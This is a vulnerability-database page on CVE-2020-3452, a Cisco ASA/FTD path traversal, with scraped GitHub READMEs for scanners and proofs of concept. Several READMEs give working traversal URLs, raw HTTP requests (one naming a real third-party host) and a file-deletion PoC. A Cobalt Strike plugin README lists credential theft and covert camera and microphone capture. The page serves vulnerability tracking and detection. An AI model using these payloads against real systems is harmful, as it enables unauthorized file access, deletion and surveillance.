5
CVSSv2

CVE-2020-3452

Published: 22/07/2020 Updated: 29/07/2020
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote malicious user to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the malicious user to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.

Vulnerability Trend

Affected Products

Vendor Product Versions
CiscoAdaptive Security Appliance9.6, 9.6.0, 9.6.2, 9.6.4.30, 9.6.4.31, 9.6.4.34, 9.6.4.36, 9.6.4.40, 9.8, 9.8.0, 9.8.4, 9.8.4.7, 9.8.4.9, 9.8.4.10, 9.8.4.17, 9.9, 9.9.0, 9.9.2.50, 9.9.2.56, 9.9.2.66, 9.10, 9.10.0, 9.10.1.22, 9.10.1.27, 9.10.1.30, 9.10.1.37, 9.12, 9.12.0, 9.12.2.1, 9.12.2.5, 9.12.2.9, 9.12.3, 9.12.3.7, 9.13, 9.13.0, 9.13.1, 9.13.1.2, 9.13.1.7
CiscoFirepower Threat Defense6.2.3, 6.2.3.1, 6.2.3.2, 6.2.3.3, 6.2.3.4, 6.2.3.5, 6.2.3.6, 6.2.3.7, 6.2.3.9, 6.2.3.10, 6.2.3.11, 6.2.3.12, 6.2.3.13, 6.2.3.14, 6.2.3.15, 6.3.0, 6.3.0.1, 6.3.0.2, 6.3.0.3, 6.3.0.4, 6.3.0.5, 6.4.0, 6.4.0.1, 6.4.0.2, 6.4.0.3, 6.4.0.4, 6.4.0.5, 6.4.0.6, 6.4.0.7, 6.4.0.8, 6.4.0.9, 6.5.0, 6.5.0.2, 6.5.0.3, 6.6.0

Vendor Advisories

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system The vulnerability is due to a lack of proper input validation of URL ...

Mailing Lists

Adaptive Security Appliance Software version 911 local file inclusion exploit ...
Cisco Adaptive Security Appliance Software version 97 unauthenticated arbitrary file deletion exploit ...

Github Repositories

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit Gh0st0ne Create nmap.nse … d07855e 26 seconds ago Create nmap.nse d07855e Git stats 2 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Initial commit 3 minutes ago nmap.nse Create nmap.nse 26 seconds ago View code README.md http-vuln-cve2020-3452.nse CVE-2020-3452 : Cisco ASA and FTD Unauthorized Remote File Reading Nmap NSE Script About CVE-2020-3452 : Cisco ASA and FTD Unauthorized Remote File Reading Nmap NSE Script Resources Readme Releases No releases published Languages Lua 100.0%

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit foulenzer Update README.md … 181c291 15 minutes ago Update README.md added output file argument 181c291 Git stats 13 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-3452.py added output file argument 16 minutes ago LICENSE Initial commit 8 days ago README.md Update README.md 15 minutes ago View code README.md CVE-2020-3452 Little, stupid python validator(?) for CVE-2020-3452 on CISCO devices. Python first timer, pls do not kill me. ;-( USAGE python CVE-2020-3452.py /path/to/input/file.txt /path/to/output/file.txt DISCLAIMER: Please use this script only on subjects you own or you have the permission to test for. INFORMATION REGARDING CVE-2020-3452 See Documents: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3452 https://nvd.nist.gov/vuln/detail/CVE-2020-3452 https://de.tenable.com/blog/cve-2020-3452-cisco-adaptive-security-appliance-and-firepower-threat-defense-path-traversal Summary: A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Note: Cisco has become aware of the availability of public exploit code and active exploitation of the vulnerability that is described in this advisory. Cisco encourages customers with affected products to upgrade to a fixed release as soon as possible." @ https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 About No description, website, or topics provided. Resources Readme License GPL-3.0 License Releases No releases published Languages Python 100.0%

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit dinhbaouit update … 8e07b67 3 minutes ago update 8e07b67 Git stats 4 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md update 4 minutes ago delete_file.png 1st commit 25 minutes ago file_after_delete.png 1st commit 25 minutes ago file_before_delete.png 1st commit 25 minutes ago fixed.png update 20 minutes ago lfd.png 1st commit 25 minutes ago password.png 1st commit 25 minutes ago View code README.md Exploit CISCO Remove File Via session_password.html Detect and Verify that the vulnerability: Downloaded the vulnerable code and compared it with the code from local environment. When this path exists +CSCOE+/session_password.html this means the vulnerability isn't patched , and if the response is 404 that means the vulnerability is patched Vuln: Patched: Exploiting the vulnerability: Trying to download a file using CVE-2020-3452: https://192.168.1.100/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/wrong_url.html&default-language&lang=../ Issue Request Exploit the vulnerability: GET /+CSCOE+/session_password.html HTTP/1.1 Host: 192.168.1.100 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Cookie: token=../../../../../../+CSCOE+/wrong_url.html Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 The file is read and stored in webvpn cookie and then deleted. https://192.168.1.100/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/wrong_url.html&default-language&lang=../ This file has been deleted. About POC CISCO Remove File Resources Readme Releases No releases published

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit XDev05 Update README.md … da4600f now Update README.md da4600f Git stats 3 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Update README.md now View code README.md CVE-2020-3452 hello Guys This is a simple script to download the nmap NSE script and put in NSE modules file and run the nmap command with and hosts you want Put your host list in list.txt file Thanks About No description, website, or topics provided. Resources Readme Releases No releases published

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit mr-r3b00t Initial commit … 0968b9f 3 minutes ago Initial commit 0968b9f Git stats 1 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Initial commit 3 minutes ago View code README.md CVE-2020-3452 About No description, website, or topics provided. Resources Readme Releases No releases published

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit root intial commit … 2afb69b 2 minutes ago intial commit 2afb69b Git stats 2 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time LICENSE Initial commit 10 minutes ago README.md intial commit 2 minutes ago scanner.py intial commit 2 minutes ago urls.txt intial commit 2 minutes ago View code README.md #CVE-2020-3452 - Cisco ASA Scanner Scanning for CVE-2020-3452 - unauth Path Traversal affecting Cisco ASA firewalls running anyconnect https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3452 Supporting Documents: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 https://twitter.com/aboul3la/status/1286012324722155525 Disclaimer: I am not responsible for the use of this tool or any damages, DO NOT USE THIS FOR ILLEGAL PURPOSES. This tool was designed to scan for authorised assets to automate the check for this vulnerability on multiple cisco instances Introduction: A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features I created this script to allow a engineer to parse in a file of urls to test against. Install: git clone https://github.com/PR3R00T/CVE-2020-3452-Cisco-Scanner.git chmod +x scanner.py amend the urls.txt file with the urls https://XX.XX format. python3 ./scanner.py About CVE-2020-3452 Cisco ASA Scanner -unauth Path Traversal Check Resources Readme License GPL-3.0 License Releases No releases published Languages Python 100.0%

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit paran0id34 Add files via upload … bfd894a 13 minutes ago Add files via upload bfd894a Git stats 2 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Initial commit 14 minutes ago cve_2020_3452.py Add files via upload 13 minutes ago View code README.md CVE-2020-3452 CVE-2020-3452 - directory traversal in Cisco ASA and Cisco Firepower Threat Defense About CVE-2020-3452 - directory traversal in Cisco ASA and Cisco Firepower Threat Defense Resources Readme Releases No releases published Languages Python 100.0%

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit foulenzer Update README.md … 2f3b09d 10 minutes ago Update README.md 2f3b09d Git stats 4 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-3452.py added file 17 minutes ago LICENSE Initial commit 18 minutes ago README.md Update README.md 10 minutes ago View code README.md CVE-2020-3452 Little, stupid python validator for CVE-2020-3452 on CISCO devices. Python first timer, pls do not kill me. ;-( DISCLAIMER: Please use this script only on subjects you own or you have the permission to test for. See Documents: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3452 https://nvd.nist.gov/vuln/detail/CVE-2020-3452 https://de.tenable.com/blog/cve-2020-3452-cisco-adaptive-security-appliance-and-firepower-threat-defense-path-traversal "Summary: A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Note: Cisco has become aware of the availability of public exploit code and active exploitation of the vulnerability that is described in this advisory. Cisco encourages customers with affected products to upgrade to a fixed release as soon as possible." @ https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 About No description, website, or topics provided. Resources Readme License GPL-3.0 License Releases No releases published Languages Python 100.0%

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit bn9r added file … aaeb6cf 2 minutes ago added file v0.1 - just a really simple script, that I made to scan for vulnerable subjects for CVE-2020-3452 aaeb6cf Git stats 2 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-3452.py added file 2 minutes ago LICENSE Initial commit 3 minutes ago README.md Initial commit 3 minutes ago View code README.md cve-2020-3452 About No description, website, or topics provided. Resources Readme License GPL-3.0 License Releases No releases published Languages Python 100.0%

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit knassar702 Update README.md … 3e25755 3 minutes ago Update README.md 3e25755 Git stats 14 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time src Add files via upload 4 minutes ago .gitignore Initial commit 35 minutes ago LICENSE Initial commit 35 minutes ago PmG.py Add files via upload 4 minutes ago README.md Update README.md 3 minutes ago urls.txt Add files via upload 4 minutes ago View code README.md pmg Extract parameters/paths from urls usage : $ cat urls.txt | python3 PmG.py results Save results $ cat urls.txt | python3 PmG.py ResultsFile.txt here you can add more parameters/paths using regex :D wordlist = [ r'(url=|password=|link=|u=|word=|username=|link_id=)', r'\+CSCOU+', # CVE-2020-3452 r'\.(sql|db|tar|backup|bak|zip|git|php)' ] About Extract parameters/paths from urls Topics bughunting bugbounty bugbounty-tool regex python security Resources Readme License Apache-2.0 License Releases No releases published Languages Python 100.0%

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit Loneyers Create cve-2020-3452.go … bd13712 1 minute ago Create cve-2020-3452.go bd13712 Git stats 2 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Initial commit 3 minutes ago cve-2020-3452.go Create cve-2020-3452.go 1 minute ago View code README.md cve-2020-3452 unauth file read in cisco asa & firepower. About unauth file read in cisco asa & firepower. Resources Readme Releases No releases published Languages Go 100.0%

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit tacticalDevC Initial commit … 168427c 3 minutes ago Initial commit 168427c Git stats 1 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time LICENSE Initial commit 3 minutes ago README.md Initial commit 3 minutes ago View code README.md CVE-2020-3452 CVE-2020-3452 exploit About CVE-2020-3452 exploit Resources Readme License MIT License Releases No releases published

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit murataydemir Update README.md … fd482c9 14 seconds ago Update README.md fd482c9 Git stats 3 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Update README.md 33 seconds ago View code README.md [CVE-2020-3452] Cisco ASA & Cisco Firepower Unauthenticated File Read https://{host}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1 Host: scrvpn.socar.com.tr User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close https://{host}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1 Host: scrvpn.socar.com.tr User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close About [CVE-2020-3452] Cisco ASA & Firepower Unauthenticated File Read Resources Readme Releases No releases published

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit RASSec Create README.md … c4a90e4 15 minutes ago Create README.md c4a90e4 Git stats 1 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Create README.md 15 minutes ago View code README.md open-twitter-hacking Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower. For example to read "/+CSCOE+/portal_inc.lua" file. https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ Happy Hacking! About No description, website, or topics provided. Resources Readme Releases No releases published

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit ihebski Update README.md … 18ef747 3 minutes ago Update README.md 18ef747 Git stats 10 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time BIG-IPF5_CVE-2020-5902.sh CVE-2020-5902 27 minutes ago README.md Update README.md 3 minutes ago citrix_CVE-2019-19781.sh CVE-2019-19781 27 minutes ago scan_cisco_asa_CVE-2020-3452.sh CVE-2020-3452 25 minutes ago template.sh Script template 24 minutes ago View code README.md are_we_vulnerable Checking the recently disclosed vulnerabilities over the network. BIG-IPF5_CVE(2020-5902) - https://github.com/yasserjanah/CVE-2020-5902 Citrix Application Delivery Controller and Citrix Gateway(CVE-2019-19781) - https://github.com/mpgn/CVE-2019-19781 Cisco Adaptive Security Appliance and Firepower Threat Defense (CVE-2020-3452) - https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-3452.nse Usage $ echo "host1 host2 host3" | ./scanner Reading an input from a file $ cat myservers.txt | ./scanner About checking the recently disclosed vulnerabilities over the network. Topics citrix bigipf5 cisco-asa Resources Readme Languages Shell 100.0%

master 2 branches 3 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit pandasec888 Update README.md … fc4b5f2 4 minutes ago Update README.md fc4b5f2 Git stats 82 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time img Add files via upload 14 days ago modules Add files via upload 14 days ago script Add files via upload 14 days ago Main.cna Add files via upload 14 days ago README.md Update README.md 4 minutes ago View code README.md 梼杌 仅供交流与学习使用,请勿用于非法用途! 适用于cobalt strike3.x与cobalt strike4.x的插件 插件里面利用到的exp均为网上搜集,不保证安全问题,请务必自主进行相关安全审查! English-version 感谢vcarus提供英文翻译支持 Thanks to vcarus for English translation support 功能简介 贡献者 vcarus 参考 https://github.com/DeEpinGh0st/Erebus https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts https://github.com/0x09AL/RdpThief https://github.com/uknowsec/sharptoolsaggressor https://github.com/lengjibo/RedTeamTools/tree/master/windows/Cobalt%20Strike 如有遗漏,请见谅。 更新3.1(2020.7.28) 1.信息收集模块增加杀软对比(对uknowsec师傅的SharpAVKB稍作修改,与Vulkey_Chen师傅的avList结合,添加了大约400个左右的AV进程检测。 2.漏洞检测模块增加CISCO ASA(CVE-2020-3452)、weblogic(CVE-2016-0638,CVE-2016-3510,CVE-2017-3248,CVE-2017-10271,CVE-2018-2628,CVE-2018-2893,CVE-2019-2725) 3.获取凭证模块增加RcoIl师傅的SharpDecryptPwd现在共有两个SharpDecryptPwd 4.权限提升模块增加dazzleUP 5.娱乐模块增加录音(扬声器、麦克风)、开启摄像头拍照功能 更新3.0(2020.7.14) 1.增加“权限提升”“横向移动”模块 2.优化部分功能的执行方式 3.增加端口转发等功能 公告 1.梼杌本身是一个原创加学习结合的项目,一开始就具备了包容的属性,感谢github具有分享精神的大佬开源了这么多优秀的代码,站在巨人的肩膀上总是能看见更大的世界。 2.为了更好的维护该项目,现邀请对此项目感兴趣的所有人共同参与维护开发,项目维护开发不限功能不限技术水平,即使只是输出一个whoami。参与维护的大佬可以直接将代码提交至github或者发送到邮箱taowuopen@protonmail.com。 3.参与维护开发的大佬请在邮件中注明自己的ID与github或是博客地址,以上内容将永久附在github项目页面以及梼杌关于模块一栏。 4.因为各种原因,在项目维护开发中会产生一些不公开的版本,后面会统一为参与维护开发的作者提供梼杌不公开版本。 About No description, website, or topics provided. Resources Readme Releases 3 梼杌3.0 Latest 14 days ago + 2 releases Languages PowerShell 100.0%

master 1 branch 43 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit bauthard Adding template details. … Loading status checks… c429207 5 minutes ago Adding template details. c429207 Git stats 814 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time .github/workflows Check all branches during syntax linting 3 months ago basic-detections adding condition 28 days ago brute-force Update tomcat-manager-bruteforce.yaml 4 days ago cves Update CVE-2017-9841.yaml 23 hours ago dns uniform severity update 4 days ago files Update wadl-files.yaml 2 days ago panels uniform severity update 4 days ago payloads Add dedicated payloads dir - CVE-2020-6287 18 days ago security-misconfiguration Update wamp-xdebug-detect.yaml 5 days ago subdomain-takeover Update detect-all-takeovers.yaml 4 days ago technologies tech updates 10 hours ago tokens syntax update 8 days ago vulnerabilities Improve shellshock payload 2 days ago workflows SAP NetWeaver Workflow 18 days ago .gitignore Update .gitignore 10 days ago .pre-commit-config.yaml Add pre-commit and yamllint configuration 3 months ago .yamllint Fixed linting rules for more relaxed 3 months ago LICENSE Create LICENSE 4 months ago README.md Adding template details. 5 minutes ago View code README.md Templates are the core of nuclei scanner which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via pull requests and grow the list. Template Directory ├── LICENSE ├── README.md ├── basic-detections │   ├── basic-xss-prober.yaml │   └── general-tokens.yaml ├── brute-force │   └── tomcat-manager-bruteforce.yaml ├── cves │   ├── CVE-2017-10075.yaml │   ├── CVE-2017-7529.yaml │   ├── CVE-2017-9506.yaml │   ├── CVE-2017-9841.yaml │   ├── CVE-2018-0296.yaml │   ├── CVE-2018-1000129.yaml │   ├── CVE-2018-11409.yaml │   ├── CVE-2018-11759.yaml │   ├── CVE-2018-1247.yaml │   ├── CVE-2018-1271.yaml │   ├── CVE-2018-13379.yaml │   ├── CVE-2018-14728.yaml │   ├── CVE-2018-16341.yaml │   ├── CVE-2018-18069.yaml │   ├── CVE-2018-19439.yaml │   ├── CVE-2018-20824.yaml │   ├── CVE-2018-2791.yaml │   ├── CVE-2018-3714.yaml │   ├── CVE-2018-3760.yaml │   ├── CVE-2018-5230.yaml │   ├── CVE-2018-7490.yaml │   ├── CVE-2019-10475.yaml │   ├── CVE-2019-11510.yaml │   ├── CVE-2019-12314.yaml │   ├── CVE-2019-14322.yaml │   ├── CVE-2019-14974.yaml │   ├── CVE-2019-15043.yaml │   ├── CVE-2019-16759.yaml │   ├── CVE-2019-17382.yaml │   ├── CVE-2019-18394.yaml │   ├── CVE-2019-19368.yaml │   ├── CVE-2019-19781.yaml │   ├── CVE-2019-19908.yaml │   ├── CVE-2019-19985.yaml │   ├── CVE-2019-2588.yaml │   ├── CVE-2019-3396.yaml │   ├── CVE-2019-3799.yaml │   ├── CVE-2019-5418.yaml │   ├── CVE-2019-8449.yaml │   ├── CVE-2019-8451.yaml │   ├── CVE-2019-8903.yaml │   ├── CVE-2019-8982.yaml │   ├── CVE-2020-10199.yaml │   ├── CVE-2020-10204.yaml │   ├── CVE-2020-1147.yaml │   ├── CVE-2020-12720.yaml │   ├── CVE-2020-13167.yaml │   ├── CVE-2020-2096.yaml │   ├── CVE-2020-3187.yaml │   ├── CVE-2020-3452.yaml │   ├── CVE-2020-5284.yaml │   ├── CVE-2020-5405.yaml │   ├── CVE-2020-5410.yaml │   ├── CVE-2020-5902.yaml │   ├── CVE-2020-6287.yaml │   ├── CVE-2020-7209.yaml │   ├── CVE-2020-7961.yaml │   ├── CVE-2020-8091.yaml │   ├── CVE-2020-8115.yaml │   ├── CVE-2020-8191.yaml │   ├── CVE-2020-8193.yaml │   ├── CVE-2020-8194.yaml │   ├── CVE-2020-8512.yaml │   ├── CVE-2020-8982.yaml │   ├── CVE-2020-9484.yaml │   └── CVE-2020-9757.yaml ├── dns │   ├── azure-takeover-detection.yaml │   ├── cname-service-detector.yaml │   ├── dead-host-with-cname.yaml │   └── servfail-refused-hosts.yaml ├── files │   ├── apc-info.yaml │   ├── cgi-test-page.yaml │   ├── debug-pprof.yaml │   ├── dir-listing.yaml │   ├── docker-registry.yaml │   ├── drupal-install.yaml │   ├── elasticsearch.yaml │   ├── exposed-kibana.yaml │   ├── exposed-svn.yaml │   ├── filezilla.yaml │   ├── firebase-detect.yaml │   ├── git-config.yaml │   ├── htaccess-config.yaml │   ├── jkstatus-manager.yaml │   ├── jolokia.yaml │   ├── laravel-env.yaml │   ├── lazy-file.yaml │   ├── phpinfo.yaml │   ├── public-tomcat-instance.yaml │   ├── security.txt.yaml │   ├── server-status-localhost.yaml │   ├── telerik-dialoghandler-detect.yaml │   ├── telerik-fileupload-detect.yaml │   ├── tomcat-scripts.yaml │   ├── wadl-files.yaml │   ├── web-config.yaml │   ├── wordpress-directory-listing.yaml │   ├── wordpress-user-enumeration.yaml │   ├── wp-xmlrpc.yaml │   └── zip-backup-files.yaml ├── panels │   ├── 